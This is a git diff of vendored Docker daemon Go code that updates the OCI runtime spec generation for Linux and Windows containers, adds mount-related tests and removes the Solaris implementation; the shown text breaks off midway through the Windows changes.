-	optsSplit := strings.Split(optionalOpts, " ")
-	for _, opt := range optsSplit {
-		if strings.HasPrefix(opt, "shared:") {
-			sharedMount = true
-			break
-		}
-	}
-
-	if !sharedMount {
-		return fmt.Errorf("Path %s is mounted on %s but it is not a shared mount.", path, sourceMount)
+	if !hasMountinfoOption(optionalOpts, sharedPropagationOption) {
+		return errors.Errorf("path %s is mounted on %s but it is not a shared mount", path, sourceMount)
 	}
 	return nil
 }
 
 // Ensure mount point on which path is mounted, is either shared or slave.
 func ensureSharedOrSlave(path string) error {
-	sharedMount := false
-	slaveMount := false
-
 	sourceMount, optionalOpts, err := getSourceMount(path)
 	if err != nil {
 		return err
 	}
-	// Make sure source mount point is shared.
-	optsSplit := strings.Split(optionalOpts, " ")
-	for _, opt := range optsSplit {
-		if strings.HasPrefix(opt, "shared:") {
-			sharedMount = true
-			break
-		} else if strings.HasPrefix(opt, "master:") {
-			slaveMount = true
-			break
-		}
-	}
 
-	if !sharedMount && !slaveMount {
-		return fmt.Errorf("Path %s is mounted on %s but it is not a shared or slave mount.", path, sourceMount)
+	if !hasMountinfoOption(optionalOpts, sharedPropagationOption, slavePropagationOption) {
+		return errors.Errorf("path %s is mounted on %s but it is not a shared or slave mount", path, sourceMount)
 	}
 	return nil
 }
 
+// Get the set of mount flags that are set on the mount that contains the given
+// path and are locked by CL_UNPRIVILEGED. This is necessary to ensure that
+// bind-mounting "with options" will not fail with user namespaces, due to
+// kernel restrictions that require user namespace mounts to preserve
+// CL_UNPRIVILEGED locked flags.
+func getUnprivilegedMountFlags(path string) ([]string, error) {
+	var statfs unix.Statfs_t
+	if err := unix.Statfs(path, &statfs); err != nil {
+		return nil, err
+	}
+
+	// The set of keys come from https://github.com/torvalds/linux/blob/v4.13/fs/namespace.c#L1034-L1048.
+	unprivilegedFlags := map[uint64]string{
+		unix.MS_RDONLY:     "ro",
+		unix.MS_NODEV:      "nodev",
+		unix.MS_NOEXEC:     "noexec",
+		unix.MS_NOSUID:     "nosuid",
+		unix.MS_NOATIME:    "noatime",
+		unix.MS_RELATIME:   "relatime",
+		unix.MS_NODIRATIME: "nodiratime",
+	}
+
+	var flags []string
+	for mask, flag := range unprivilegedFlags {
+		if uint64(statfs.Flags)&mask == mask {
+			flags = append(flags, flag)
+		}
+	}
+
+	return flags, nil
+}
+
 var (
 	mountPropagationMap = map[string]int{
 		"private":  mount.PRIVATE,
@@ -434,35 +444,66 @@ var (
 	}
 )
 
+// inSlice tests whether a string is contained in a slice of strings or not.
+// Comparison is case sensitive
+func inSlice(slice []string, s string) bool {
+	for _, ss := range slice {
+		if s == ss {
+			return true
+		}
+	}
+	return false
+}
+
 func setMounts(daemon *Daemon, s *specs.Spec, c *container.Container, mounts []container.Mount) error {
 	userMounts := make(map[string]struct{})
 	for _, m := range mounts {
 		userMounts[m.Destination] = struct{}{}
 	}
 
-	// Filter out mounts that are overridden by user supplied mounts
-	var defaultMounts []specs.Mount
+	// Copy all mounts from spec to defaultMounts, except for
+	//  - mounts overriden by a user supplied mount;
+	//  - all mounts under /dev if a user supplied /dev is present;
+	//  - /dev/shm, in case IpcMode is none.
+	// While at it, also
+	//  - set size for /dev/shm from shmsize.
+	defaultMounts := s.Mounts[:0]
 	_, mountDev := userMounts["/dev"]
 	for _, m := range s.Mounts {
-		if _, ok := userMounts[m.Destination]; !ok {
-			if mountDev && strings.HasPrefix(m.Destination, "/dev/") {
+		if _, ok := userMounts[m.Destination]; ok {
+			// filter out mount overridden by a user supplied mount
+			continue
+		}
+		if mountDev && strings.HasPrefix(m.Destination, "/dev/") {
+			// filter out everything under /dev if /dev is user-mounted
+			continue
+		}
+
+		if m.Destination == "/dev/shm" {
+			if c.HostConfig.IpcMode.IsNone() {
+				// filter out /dev/shm for "none" IpcMode
 				continue
 			}
-			defaultMounts = append(defaultMounts, m)
+			// set size for /dev/shm mount from spec
+			sizeOpt := "size=" + strconv.FormatInt(c.HostConfig.ShmSize, 10)
+			m.Options = append(m.Options, sizeOpt)
 		}
+
+		defaultMounts = append(defaultMounts, m)
 	}
 
 	s.Mounts = defaultMounts
 	for _, m := range mounts {
 		for _, cm := range s.Mounts {
 			if cm.Destination == m.Destination {
-				return fmt.Errorf("Duplicate mount point '%s'", m.Destination)
+				return duplicateMountPointError(m.Destination)
 			}
 		}
 
 		if m.Source == "tmpfs" {
 			data := m.Data
-			options := []string{"noexec", "nosuid", "nodev", string(volume.DefaultPropagationMode)}
+			parser := volumemounts.NewParser("linux")
+			options := []string{"noexec", "nosuid", "nodev", string(parser.DefaultPropagationMode())}
 			if data != "" {
 				options = append(options, strings.Split(data, ",")...)
 			}
@@ -486,7 +527,8 @@ func setMounts(daemon *Daemon, s *specs.Spec, c *container.Container, mounts []c
 		//
 		// For private volumes any root propagation value should work.
 		pFlag := mountPropagationMap[m.Propagation]
-		if pFlag == mount.SHARED || pFlag == mount.RSHARED {
+		switch pFlag {
+		case mount.SHARED, mount.RSHARED:
 			if err := ensureShared(m.Source); err != nil {
 				return err
 			}
@@ -494,13 +536,34 @@ func setMounts(daemon *Daemon, s *specs.Spec, c *container.Container, mounts []c
 			if rootpg != mount.SHARED && rootpg != mount.RSHARED {
 				s.Linux.RootfsPropagation = mountPropagationReverseMap[mount.SHARED]
 			}
-		} else if pFlag == mount.SLAVE || pFlag == mount.RSLAVE {
+		case mount.SLAVE, mount.RSLAVE:
+			var fallback bool
 			if err := ensureSharedOrSlave(m.Source); err != nil {
-				return err
+				// For backwards compatability purposes, treat mounts from the daemon root
+				// as special since we automatically add rslave propagation to these mounts
+				// when the user did not set anything, so we should fallback to the old
+				// behavior which is to use private propagation which is normally the
+				// default.
+				if !strings.HasPrefix(m.Source, daemon.root) && !strings.HasPrefix(daemon.root, m.Source) {
+					return err
+				}
+
+				cm, ok := c.MountPoints[m.Destination]
+				if !ok {
+					return err
+				}
+				if cm.Spec.BindOptions != nil && cm.Spec.BindOptions.Propagation != "" {
+					// This means the user explicitly set a propagation, do not fallback in that case.
+					return err
+				}
+				fallback = true
+				logrus.WithField("container", c.ID).WithField("source", m.Source).Warn("Falling back to default propagation for bind source in daemon root")
 			}
-			rootpg := mountPropagationMap[s.Linux.RootfsPropagation]
-			if rootpg != mount.SHARED && rootpg != mount.RSHARED && rootpg != mount.SLAVE && rootpg != mount.RSLAVE {
-				s.Linux.RootfsPropagation = mountPropagationReverseMap[mount.RSLAVE]
+			if !fallback {
+				rootpg := mountPropagationMap[s.Linux.RootfsPropagation]
+				if rootpg != mount.SHARED && rootpg != mount.RSHARED && rootpg != mount.SLAVE && rootpg != mount.RSLAVE {
+					s.Linux.RootfsPropagation = mountPropagationReverseMap[mount.RSLAVE]
+				}
 			}
 		}
 
@@ -512,6 +575,19 @@ func setMounts(daemon *Daemon, s *specs.Spec, c *container.Container, mounts []c
 			opts = append(opts, mountPropagationReverseMap[pFlag])
 		}
 
+		// If we are using user namespaces, then we must make sure that we
+		// don't drop any of the CL_UNPRIVILEGED "locked" flags of the source
+		// "mount" when we bind-mount. The reason for this is that at the point
+		// when runc sets up the root filesystem, it is already inside a user
+		// namespace, and thus cannot change any flags that are locked.
+		if daemon.configStore.RemappedRoot != "" {
+			unprivOpts, err := getUnprivilegedMountFlags(m.Source)
+			if err != nil {
+				return err
+			}
+			opts = append(opts, unprivOpts...)
+		}
+
 		mt.Options = opts
 		s.Mounts = append(s.Mounts, mt)
 	}
@@ -519,11 +595,11 @@ func setMounts(daemon *Daemon, s *specs.Spec, c *container.Container, mounts []c
 	if s.Root.Readonly {
 		for i, m := range s.Mounts {
 			switch m.Destination {
-			case "/proc", "/dev/pts", "/dev/mqueue": // /dev is remounted by runc
+			case "/proc", "/dev/pts", "/dev/shm", "/dev/mqueue", "/dev":
 				continue
 			}
 			if _, ok := userMounts[m.Destination]; !ok {
-				if !stringutils.InSlice(m.Options, "ro") {
+				if !inSlice(m.Options, "ro") {
 					s.Mounts[i].Options = append(s.Mounts[i].Options, "ro")
 				}
 			}
@@ -531,12 +607,10 @@ func setMounts(daemon *Daemon, s *specs.Spec, c *container.Container, mounts []c
 	}
 
 	if c.HostConfig.Privileged {
-		if !s.Root.Readonly {
-			// clear readonly for /sys
-			for i := range s.Mounts {
-				if s.Mounts[i].Destination == "/sys" {
-					clearReadOnly(&s.Mounts[i])
-				}
+		// clear readonly for /sys
+		for i := range s.Mounts {
+			if s.Mounts[i].Destination == "/sys" {
+				clearReadOnly(&s.Mounts[i])
 			}
 		}
 		s.Linux.ReadonlyPaths = nil
@@ -545,7 +619,7 @@ func setMounts(daemon *Daemon, s *specs.Spec, c *container.Container, mounts []c
 
 	// TODO: until a kernel/mount solution exists for handling remount in a user namespace,
 	// we must clear the readonly flag for the cgroups mount (@mrunalp concurs)
-	if uidMap, _ := daemon.GetUIDGIDMaps(); uidMap != nil || c.HostConfig.Privileged {
+	if uidMap := daemon.idMappings.UIDs(); uidMap != nil || c.HostConfig.Privileged {
 		for i, m := range s.Mounts {
 			if m.Type == "cgroup" {
 				clearReadOnly(&s.Mounts[i])
@@ -557,16 +631,18 @@ func setMounts(daemon *Daemon, s *specs.Spec, c *container.Container, mounts []c
 }
 
 func (daemon *Daemon) populateCommonSpec(s *specs.Spec, c *container.Container) error {
+	if c.BaseFS == nil {
+		return errors.New("populateCommonSpec: BaseFS of container " + c.ID + " is unexpectedly nil")
+	}
 	linkedEnv, err := daemon.setupLinkedContainers(c)
 	if err != nil {
 		return err
 	}
-	s.Root = specs.Root{
-		Path:     c.BaseFS,
+	s.Root = &specs.Root{
+		Path:     c.BaseFS.Path(),
 		Readonly: c.HostConfig.ReadonlyRootfs,
 	}
-	rootUID, rootGID := daemon.GetRemappedUIDGID()
-	if err := c.SetupWorkingDirectory(rootUID, rootGID); err != nil {
+	if err := c.SetupWorkingDirectory(daemon.idMappings.RootPair()); err != nil {
 		return err
 	}
 	cwd := c.Config.WorkingDir
@@ -583,8 +659,8 @@ func (daemon *Daemon) populateCommonSpec(s *specs.Spec, c *container.Container)
 			(c.HostConfig.Init == nil && daemon.configStore.Init) {
 			s.Process.Args = append([]string{"/dev/init", "--", c.Path}, c.Args...)
 			var path string
-			if daemon.configStore.InitPath == "" && c.HostConfig.InitPath == "" {
-				path, err = exec.LookPath(DefaultInitBinary)
+			if daemon.configStore.InitPath == "" {
+				path, err = exec.LookPath(daemonconfig.DefaultInitBinary)
 				if err != nil {
 					return err
 				}
@@ -592,9 +668,6 @@ func (daemon *Daemon) populateCommonSpec(s *specs.Spec, c *container.Container)
 			if daemon.configStore.InitPath != "" {
 				path = daemon.configStore.InitPath
 			}
-			if c.HostConfig.InitPath != "" {
-				path = c.HostConfig.InitPath
-			}
 			s.Mounts = append(s.Mounts, specs.Mount{
 				Destination: "/dev/init",
 				Type:        "bind",
@@ -611,7 +684,7 @@ func (daemon *Daemon) populateCommonSpec(s *specs.Spec, c *container.Container)
 	return nil
 }
 
-func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) {
+func (daemon *Daemon) createSpec(c *container.Container) (retSpec *specs.Spec, err error) {
 	s := oci.DefaultSpec()
 	if err := daemon.populateCommonSpec(&s, c); err != nil {
 		return nil, err
@@ -637,25 +710,24 @@ func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) {
 	} else {
 		cgroupsPath = filepath.Join(parent, c.ID)
 	}
-	s.Linux.CgroupsPath = &cgroupsPath
+	s.Linux.CgroupsPath = cgroupsPath
 
 	if err := setResources(&s, c.HostConfig.Resources); err != nil {
 		return nil, fmt.Errorf("linux runtime spec resources: %v", err)
 	}
-	s.Linux.Resources.OOMScoreAdj = &c.HostConfig.OomScoreAdj
 	s.Linux.Sysctl = c.HostConfig.Sysctls
 
-	p := *s.Linux.CgroupsPath
+	p := s.Linux.CgroupsPath
 	if useSystemd {
-		initPath, err := cgroups.GetInitCgroupDir("cpu")
+		initPath, err := cgroups.GetInitCgroup("cpu")
 		if err != nil {
 			return nil, err
 		}
-		p, _ = cgroups.GetThisCgroupDir("cpu")
+		_, err = cgroups.GetOwnCgroup("cpu")
 		if err != nil {
 			return nil, err
 		}
-		p = filepath.Join(initPath, p)
+		p = filepath.Join(initPath, s.Linux.CgroupsPath)
 	}
 
 	// Clean path to guard against things like ../../../BAD
@@ -670,7 +742,7 @@ func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) {
 	if err := setDevices(&s, c); err != nil {
 		return nil, fmt.Errorf("linux runtime spec devices: %v", err)
 	}
-	if err := setRlimits(daemon, &s, c); err != nil {
+	if err := daemon.setRlimits(&s, c); err != nil {
 		return nil, fmt.Errorf("linux runtime spec rlimits: %v", err)
 	}
 	if err := setUser(&s, c); err != nil {
@@ -686,10 +758,20 @@ func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) {
 		return nil, fmt.Errorf("linux seccomp: %v", err)
 	}
 
+	if err := daemon.setupContainerMountsRoot(c); err != nil {
+		return nil, err
+	}
+
 	if err := daemon.setupIpcDirs(c); err != nil {
 		return nil, err
 	}
 
+	defer func() {
+		if err != nil {
+			daemon.cleanupSecretDir(c)
+		}
+	}()
+
 	if err := daemon.setupSecretDir(c); err != nil {
 		return nil, err
 	}
@@ -699,7 +781,9 @@ func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) {
 		return nil, err
 	}
 
-	ms = append(ms, c.IpcMounts()...)
+	if !c.HostConfig.IpcMode.IsPrivate() && !c.HostConfig.IpcMode.IsEmpty() {
+		ms = append(ms, c.IpcMounts()...)
+	}
 
 	tmpfsMounts, err := c.TmpfsMounts()
 	if err != nil {
@@ -707,9 +791,11 @@ func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) {
 	}
 	ms = append(ms, tmpfsMounts...)
 
-	if m := c.SecretMount(); m != nil {
-		ms = append(ms, *m)
+	secretMounts, err := c.SecretMounts()
+	if err != nil {
+		return nil, err
 	}
+	ms = append(ms, secretMounts...)
 
 	sort.Sort(mounts(ms))
 	if err := setMounts(daemon, &s, c, ms); err != nil {
@@ -718,14 +804,10 @@ func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) {
 
 	for _, ns := range s.Linux.Namespaces {
 		if ns.Type == "network" && ns.Path == "" && !c.Config.NetworkDisabled {
-			target, err := os.Readlink(filepath.Join("/proc", strconv.Itoa(os.Getpid()), "exe"))
-			if err != nil {
-				return nil, err
-			}
-
-			s.Hooks = specs.Hooks{
+			target := filepath.Join("/proc", strconv.Itoa(os.Getpid()), "exe")
+			s.Hooks = &specs.Hooks{
 				Prestart: []specs.Hook{{
-					Path: target, // FIXME: cross-platform
+					Path: target,
 					Args: []string{"libnetwork-setkey", c.ID, daemon.netController.ID()},
 				}},
 			}
@@ -758,9 +840,18 @@ func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) {
 	}
 	s.Process.SelinuxLabel = c.GetProcessLabel()
 	s.Process.NoNewPrivileges = c.NoNewPrivileges
+	s.Process.OOMScoreAdj = &c.HostConfig.OomScoreAdj
 	s.Linux.MountLabel = c.MountLabel
 
-	return (*specs.Spec)(&s), nil
+	// Set the masked and readonly paths with regard to the host config options if they are set.
+	if c.HostConfig.MaskedPaths != nil {
+		s.Linux.MaskedPaths = c.HostConfig.MaskedPaths
+	}
+	if c.HostConfig.ReadonlyPaths != nil {
+		s.Linux.ReadonlyPaths = c.HostConfig.ReadonlyPaths
+	}
+
+	return &s, nil
 }
 
 func clearReadOnly(m *specs.Mount) {
diff --git a/vendor/github.com/docker/docker/daemon/oci_linux_test.go b/vendor/github.com/docker/docker/daemon/oci_linux_test.go
new file mode 100644
index 0000000000..e618951ef9
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/oci_linux_test.go
@@ -0,0 +1,102 @@
+package daemon // import "github.com/docker/docker/daemon"
+
+import (
+	"os"
+	"testing"
+
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/daemon/config"
+	"github.com/docker/docker/oci"
+	"github.com/docker/docker/pkg/idtools"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+// TestTmpfsDevShmNoDupMount checks that a user-specified /dev/shm tmpfs
+// mount (as in "docker run --tmpfs /dev/shm:rw,size=NNN") does not result
+// in "Duplicate mount point" error from the engine.
+// https://github.com/moby/moby/issues/35455
+func TestTmpfsDevShmNoDupMount(t *testing.T) {
+	d := Daemon{
+		// some empty structs to avoid getting a panic
+		// caused by a null pointer dereference
+		idMappings:  &idtools.IDMappings{},
+		configStore: &config.Config{},
+	}
+	c := &container.Container{
+		ShmPath: "foobar", // non-empty, for c.IpcMounts() to work
+		HostConfig: &containertypes.HostConfig{
+			IpcMode: containertypes.IpcMode("shareable"), // default mode
+			// --tmpfs /dev/shm:rw,exec,size=NNN
+			Tmpfs: map[string]string{
+				"/dev/shm": "rw,exec,size=1g",
+			},
+		},
+	}
+
+	// Mimick the code flow of daemon.createSpec(), enough to reproduce the issue
+	ms, err := d.setupMounts(c)
+	assert.Check(t, err)
+
+	ms = append(ms, c.IpcMounts()...)
+
+	tmpfsMounts, err := c.TmpfsMounts()
+	assert.Check(t, err)
+	ms = append(ms, tmpfsMounts...)
+
+	s := oci.DefaultSpec()
+	err = setMounts(&d, &s, c, ms)
+	assert.Check(t, err)
+}
+
+// TestIpcPrivateVsReadonly checks that in case of IpcMode: private
+// and ReadonlyRootfs: true (as in "docker run --ipc private --read-only")
+// the resulting /dev/shm mount is NOT made read-only.
+// https://github.com/moby/moby/issues/36503
+func TestIpcPrivateVsReadonly(t *testing.T) {
+	d := Daemon{
+		// some empty structs to avoid getting a panic
+		// caused by a null pointer dereference
+		idMappings:  &idtools.IDMappings{},
+		configStore: &config.Config{},
+	}
+	c := &container.Container{
+		HostConfig: &containertypes.HostConfig{
+			IpcMode:        containertypes.IpcMode("private"),
+			ReadonlyRootfs: true,
+		},
+	}
+
+	// We can't call createSpec() so mimick the minimal part
+	// of its code flow, just enough to reproduce the issue.
+	ms, err := d.setupMounts(c)
+	assert.Check(t, err)
+
+	s := oci.DefaultSpec()
+	s.Root.Readonly = c.HostConfig.ReadonlyRootfs
+
+	err = setMounts(&d, &s, c, ms)
+	assert.Check(t, err)
+
+	// Find the /dev/shm mount in ms, check it does not have ro
+	for _, m := range s.Mounts {
+		if m.Destination != "/dev/shm" {
+			continue
+		}
+		assert.Check(t, is.Equal(false, inSlice(m.Options, "ro")))
+	}
+}
+
+func TestGetSourceMount(t *testing.T) {
+	// must be able to find source mount for /
+	mnt, _, err := getSourceMount("/")
+	assert.NilError(t, err)
+	assert.Equal(t, mnt, "/")
+
+	// must be able to find source mount for current directory
+	cwd, err := os.Getwd()
+	assert.NilError(t, err)
+	_, _, err = getSourceMount(cwd)
+	assert.NilError(t, err)
+}
diff --git a/vendor/github.com/docker/docker/daemon/oci_solaris.go b/vendor/github.com/docker/docker/daemon/oci_solaris.go
deleted file mode 100644
index 0c757f9196..0000000000
--- a/vendor/github.com/docker/docker/daemon/oci_solaris.go
+++ /dev/null
@@ -1,188 +0,0 @@
-package daemon
-
-import (
-	"fmt"
-	"path/filepath"
-	"sort"
-	"strconv"
-
-	containertypes "github.com/docker/docker/api/types/container"
-	"github.com/docker/docker/container"
-	"github.com/docker/docker/oci"
-	"github.com/docker/libnetwork"
-	"github.com/opencontainers/runtime-spec/specs-go"
-)
-
-func setResources(s *specs.Spec, r containertypes.Resources) error {
-	mem := getMemoryResources(r)
-	s.Solaris.CappedMemory = &mem
-
-	capCPU := getCPUResources(r)
-	s.Solaris.CappedCPU = &capCPU
-
-	return nil
-}
-
-func setUser(s *specs.Spec, c *container.Container) error {
-	uid, gid, additionalGids, err := getUser(c, c.Config.User)
-	if err != nil {
-		return err
-	}
-	s.Process.User.UID = uid
-	s.Process.User.GID = gid
-	s.Process.User.AdditionalGids = additionalGids
-	return nil
-}
-
-func getUser(c *container.Container, username string) (uint32, uint32, []uint32, error) {
-	return 0, 0, nil, nil
-}
-
-func (daemon *Daemon) getRunzAnet(ep libnetwork.Endpoint) (specs.Anet, error) {
-	var (
-		linkName  string
-		lowerLink string
-		defRouter string
-	)
-
-	epInfo := ep.Info()
-	if epInfo == nil {
-		return specs.Anet{}, fmt.Errorf("invalid endpoint")
-	}
-
-	nw, err := daemon.GetNetworkByName(ep.Network())
-	if err != nil {
-		return specs.Anet{}, fmt.Errorf("Failed to get network %s: %v", ep.Network(), err)
-	}
-
-	// Evaluate default router, linkname and lowerlink for interface endpoint
-	switch nw.Type() {
-	case "bridge":
-		defRouter = epInfo.Gateway().String()
-		linkName = "net0" // Should always be net0 for a container
-
-		// TODO We construct lowerlink here exactly as done for solaris bridge
-		// initialization. Need modular code to reuse.
-		options := nw.Info().DriverOptions()
-		nwName := options["com.docker.network.bridge.name"]
-		lastChar := nwName[len(nwName)-1:]
-		if _, err = strconv.Atoi(lastChar); err != nil {
-			lowerLink = nwName + "_0"
-		} else {
-			lowerLink = nwName
-		}
-
-	case "overlay":
-		defRouter = ""
-		linkName = "net1"
-
-		// TODO Follows generateVxlanName() in solaris overlay.
-		id := nw.ID()
-		if len(nw.ID()) > 12 {
-			id = nw.ID()[:12]
-		}
-		lowerLink = "vx_" + id + "_0"
-	}
-
-	runzanet := specs.Anet{
-		Linkname:          linkName,
-		Lowerlink:         lowerLink,
-		Allowedaddr:       epInfo.Iface().Address().String(),
-		Configallowedaddr: "true",
-		Defrouter:         defRouter,
-		Linkprotection:    "mac-nospoof, ip-nospoof",
-		Macaddress:        epInfo.Iface().MacAddress().String(),
-	}
-
-	return runzanet, nil
-}
-
-func (daemon *Daemon) setNetworkInterface(s *specs.Spec, c *container.Container) error {
-	var anets []specs.Anet
-
-	sb, err := daemon.netController.SandboxByID(c.NetworkSettings.SandboxID)
-	if err != nil {
-		return fmt.Errorf("Could not obtain sandbox for container")
-	}
-
-	// Populate interfaces required for each endpoint
-	for _, ep := range sb.Endpoints() {
-		runzanet, err := daemon.getRunzAnet(ep)
-		if err != nil {
-			return fmt.Errorf("Failed to get interface information for endpoint %d: %v", ep.ID(), err)
-		}
-		anets = append(anets, runzanet)
-	}
-
-	s.Solaris.Anet = anets
-	if anets != nil {
-		s.Solaris.Milestone = "svc:/milestone/container:default"
-	}
-	return nil
-}
-
-func (daemon *Daemon) populateCommonSpec(s *specs.Spec, c *container.Container) error {
-	linkedEnv, err := daemon.setupLinkedContainers(c)
-	if err != nil {
-		return err
-	}
-	s.Root = specs.Root{
-		Path:     filepath.Dir(c.BaseFS),
-		Readonly: c.HostConfig.ReadonlyRootfs,
-	}
-	rootUID, rootGID := daemon.GetRemappedUIDGID()
-	if err := c.SetupWorkingDirectory(rootUID, rootGID); err != nil {
-		return err
-	}
-	cwd := c.Config.WorkingDir
-	s.Process.Args = append([]string{c.Path}, c.Args...)
-	s.Process.Cwd = cwd
-	s.Process.Env = c.CreateDaemonEnvironment(c.Config.Tty, linkedEnv)
-	s.Process.Terminal = c.Config.Tty
-	s.Hostname = c.FullHostname()
-
-	return nil
-}
-
-func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) {
-	s := oci.DefaultSpec()
-	if err := daemon.populateCommonSpec(&s, c); err != nil {
-		return nil, err
-	}
-
-	if err := setResources(&s, c.HostConfig.Resources); err != nil {
-		return nil, fmt.Errorf("runtime spec resources: %v", err)
-	}
-
-	if err := setUser(&s, c); err != nil {
-		return nil, fmt.Errorf("spec user: %v", err)
-	}
-
-	if err := daemon.setNetworkInterface(&s, c); err != nil {
-		return nil, err
-	}
-
-	if err := daemon.setupIpcDirs(c); err != nil {
-		return nil, err
-	}
-
-	ms, err := daemon.setupMounts(c)
-	if err != nil {
-		return nil, err
-	}
-	ms = append(ms, c.IpcMounts()...)
-	tmpfsMounts, err := c.TmpfsMounts()
-	if err != nil {
-		return nil, err
-	}
-	ms = append(ms, tmpfsMounts...)
-	sort.Sort(mounts(ms))
-
-	return (*specs.Spec)(&s), nil
-}
-
-// mergeUlimits merge the Ulimits from HostConfig with daemon defaults, and update HostConfig
-// It will do nothing on non-Linux platform
-func (daemon *Daemon) mergeUlimits(c *containertypes.HostConfig) {
-	return
-}
diff --git a/vendor/github.com/docker/docker/daemon/oci_windows.go b/vendor/github.com/docker/docker/daemon/oci_windows.go
index 6e264243b4..6279d7dd20 100644
--- a/vendor/github.com/docker/docker/daemon/oci_windows.go
+++ b/vendor/github.com/docker/docker/daemon/oci_windows.go
@@ -1,17 +1,35 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
-	"syscall"
+	"fmt"
+	"io/ioutil"
+	"path/filepath"
+	"runtime"
+	"strings"
 
 	containertypes "github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/container"
 	"github.com/docker/docker/oci"
 	"github.com/docker/docker/pkg/sysinfo"
+	"github.com/docker/docker/pkg/system"
 	"github.com/opencontainers/runtime-spec/specs-go"
+	"github.com/pkg/errors"
+	"golang.org/x/sys/windows"
+	"golang.org/x/sys/windows/registry"
+)
+
+const (
+	credentialSpecRegistryLocation = `SOFTWARE\Microsoft\Windows NT\CurrentVersion\Virtualization\Containers\CredentialSpecs`
+	credentialSpecFileLocation     = "CredentialSpecs"
 )
 
 func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) {
-	s := oci.DefaultSpec()
+	img, err := daemon.imageService.GetImage(string(c.ImageID))
+	if err != nil {
+		return nil, err
+	}
+
+	s := oci.DefaultOSSpec(img.OS)
 
 	linkedEnv, err := daemon.setupLinkedContainers(c)
 	if err != nil {
@@ -25,11 +43,69 @@ func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) {
 	// In base spec
 	s.Hostname = c.FullHostname()
 
+	if err := daemon.setupSecretDir(c); err != nil {
+		return nil, err
+	}
+
+	if err := daemon.setupConfigDir(c); err != nil {
+		return nil, err
+	}
+
 	// In s.Mounts
 	mounts, err := daemon.setupMounts(c)
 	if err != nil {
 		return nil, err
 	}
+
+	var isHyperV bool
+	if c.HostConfig.Isolation.IsDefault() {
+		// Container using default isolation, so take the default from the daemon configuration
+		isHyperV = daemon.defaultIsolation.IsHyperV()
+	} else {
+		// Container may be requesting an explicit isolation mode.
+		isHyperV = c.HostConfig.Isolation.IsHyperV()
+	}
+
+	if isHyperV {
+		s.Windows.HyperV = &specs.WindowsHyperV{}
+	}
+
+	// If the container has not been started, and has configs or secrets
+	// secrets, create symlinks to each config and secret. If it has been
+	// started before, the symlinks should have already been created. Also, it
+	// is important to not mount a Hyper-V  container that has been started
+	// before, to protect the host from the container; for example, from
+	// malicious mutation of NTFS data structures.
+	if !c.HasBeenStartedBefore && (len(c.SecretReferences) > 0 || len(c.ConfigReferences) > 0) {
+		// The container file system is mounted before this function is called,
+		// except for Hyper-V containers, so mount it here in that case.
+		if isHyperV {
+			if err := daemon.Mount(c); err != nil {
+				return nil, err
+			}
+			defer daemon.Unmount(c)
+		}
+		if err := c.CreateSecretSymlinks(); err != nil {
+			return nil, err
+		}
+		if err := c.CreateConfigSymlinks(); err != nil {
+			return nil, err
+		}
+	}
+
+	secretMounts, err := c.SecretMounts()
+	if err != nil {
+		return nil, err
+	}
+	if secretMounts != nil {
+		mounts = append(mounts, secretMounts...)
+	}
+
+	configMounts := c.ConfigMounts()
+	if configMounts != nil {
+		mounts = append(mounts, configMounts...)
+	}
+
 	for _, mount := range mounts {
 		m := specs.Mount{
 			Source:      mount.Source,
@@ -38,15 +114,115 @@ func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) {
 		if !mount.Writable {
 			m.Options = append(m.Options, "ro")
 		}
+		if img.OS != runtime.GOOS {
+			m.Type = "bind"
+			m.Options = append(m.Options, "rbind")
+			m.Options = append(m.Options, fmt.Sprintf("uvmpath=/tmp/gcs/%s/binds", c.ID))
+		}
 		s.Mounts = append(s.Mounts, m)
 	}
 
 	// In s.Process
 	s.Process.Args = append([]string{c.Path}, c.Args...)
-	if !c.Config.ArgsEscaped {
+	if !c.Config.ArgsEscaped && img.OS == "windows" {
 		s.Process.Args = escapeArgs(s.Process.Args)
 	}
+
 	s.Process.Cwd = c.Config.WorkingDir
+	s.Process.Env = c.CreateDaemonEnvironment(c.Config.Tty, linkedEnv)
+	if c.Config.Tty {
+		s.Process.Terminal = c.Config.Tty
+		s.Process.ConsoleSize = &specs.Box{
+			Height: c.HostConfig.ConsoleSize[0],
+			Width:  c.HostConfig.ConsoleSize[1],
+		}
+	}
+	s.Process.User.Username = c.Config.User
+	s.Windows.LayerFolders, err = daemon.imageService.GetLayerFolders(img, c.RWLayer)
+	if err != nil {
+		return nil, errors.Wrapf(err, "container %s", c.ID)
+	}
+
+	dnsSearch := daemon.getDNSSearchSettings(c)
+
+	// Get endpoints for the libnetwork allocated networks to the container
+	var epList []string
+	AllowUnqualifiedDNSQuery := false
+	gwHNSID := ""
+	if c.NetworkSettings != nil {
+		for n := range c.NetworkSettings.Networks {
+			sn, err := daemon.FindNetwork(n)
+			if err != nil {
+				continue
+			}
+
+			ep, err := getEndpointInNetwork(c.Name, sn)
+			if err != nil {
+				continue
+			}
+
+			data, err := ep.DriverInfo()
+			if err != nil {
+				continue
+			}
+
+			if data["GW_INFO"] != nil {
+				gwInfo := data["GW_INFO"].(map[string]interface{})
+				if gwInfo["hnsid"] != nil {
+					gwHNSID = gwInfo["hnsid"].(string)
+				}
+			}
+
+			if data["hnsid"] != nil {
+				epList = append(epList, data["hnsid"].(string))
+			}
+
+			if data["AllowUnqualifiedDNSQuery"] != nil {
+				AllowUnqualifiedDNSQuery = true
+			}
+		}
+	}
+
+	var networkSharedContainerID string
+	if c.HostConfig.NetworkMode.IsContainer() {
+		networkSharedContainerID = c.NetworkSharedContainerID
+		for _, ep := range c.SharedEndpointList {
